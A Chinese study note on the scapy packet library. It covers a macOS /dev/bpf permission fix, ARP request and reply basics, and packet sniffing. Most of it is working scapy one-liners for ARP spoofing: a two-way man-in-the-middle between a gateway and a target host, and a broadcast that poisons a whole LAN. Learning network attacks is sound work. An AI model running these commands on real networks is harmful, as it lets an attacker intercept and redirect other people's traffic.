scapy 模块研究

问题一：Mac平台scapy安装遇到的坑——找不到/dev/pbf*

正确的方法是先去看看/dev文件夹下是否有bpf文件，也许是bpf1、bpf2等，然后
sudo chgrp admin /dev/bpf*
sudo chmod g+rw /dev/bpf*
然后就可以了，猜测估计是权限不足导致读取不到。

arp 报文字段说明

发送arp请求报文

res=sr1(ARP(pdst="192.168.1.101"))   #查询192.168.1.101的MAC地址
res.hwsrc      #ac:c1:ee:31:1b:e6  源主机的mac地址
res.hwdst     # 目的主机的 mac 地址

发送arp响应报文

send(ARP(pdst="192.168.1.101",op=2))　主动通知101主机当前机器的ip和MAC地址   op=2表示arp 是应答报文

srloop(ARP(psrc="192.168.1.101",hwsrc="11:22:33:44:55:66",pdst="192.168.1.1",op=2))  主动告知192.168.1.1   192.168.1.101的MAC地址是11:22:33:44:55:66，并循环发送。如果该mac地址是虚假的，就达到欺骗的目的

双向欺骗

场景：当前路由器的ip地址是192.168.1.1,MAC地址是24:69:68:49:67:e0
　 本机ip是192.168.1.106，MAC地址是e0:94:67:79:17:2e
　 目标机器ip是192.168.1.101，MAC地址是ac:c1:ee:31:1b:e6

srploop(Ether(dst="ac:c1:ee:31:1b:e6")/ARP(psrc="192.168.1.1",hwsrc="e0:94:67:79:17:2e",pdst="192.168.1.101",hwdst="ac:c1:ee:31:1b:e6",op=2))  将路由器的mac地址改成本机的，欺骗101主机本机是网关。 
srploop(Ether(dst="24:69:68:49:67:e0")/ARP(psrc="192.168.1.101",hwsrc="e0:94:67:79:17:2e",pdst="192.168.1.1",hwdst="24:69:68:49:67:e0",op=2)) 将101主机的mac地址改成本机的，欺骗网关本机是101主机 

欺骗局域网所有机器

srploop(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(hwsrc="00:e0:70:52:54:26",psrc="192.168.200.1",op=2))   #主动告诉局域网的所有机器，192.168.200.1的mac地址是00:e0:70:52:54:26，如果该MAC地址是虚假的，就存在欺骗

sniff的使用

data = sniff()    #打开sniff抓包
data.show()      #查看抓包列表
data[0].show() #查看第一条详细信息

arp 欺骗资料链接：https://blog.csdn.net/cracker_zhou/article/details/54864252

arp 基本使用：https://www.wengbi.com/thread_91366_1.html

sniff的使用：https://blog.csdn.net/qq_41884756/article/details/81255092